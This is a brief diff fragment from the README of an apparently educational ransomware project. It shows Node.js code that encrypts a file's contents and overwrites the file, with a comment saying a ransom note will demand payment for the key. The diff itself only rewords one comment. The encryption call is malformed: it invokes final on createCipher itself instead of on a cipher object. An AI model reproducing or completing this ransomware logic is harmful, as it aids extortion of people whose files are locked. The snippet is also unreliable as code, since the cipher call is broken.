VolkanSah/Ransy-EDU/README.md

     .update(data, 'utf8', 'hex') +
     crypto.createCipher.final('hex');

-  // Write encrypted data back to file
+  // writing encrypted data back to file
   // Finally, the code will display a ransom note to the user, demanding payment in exchange for the decryption key.

   fs.writeFileSync(file, encryptedData);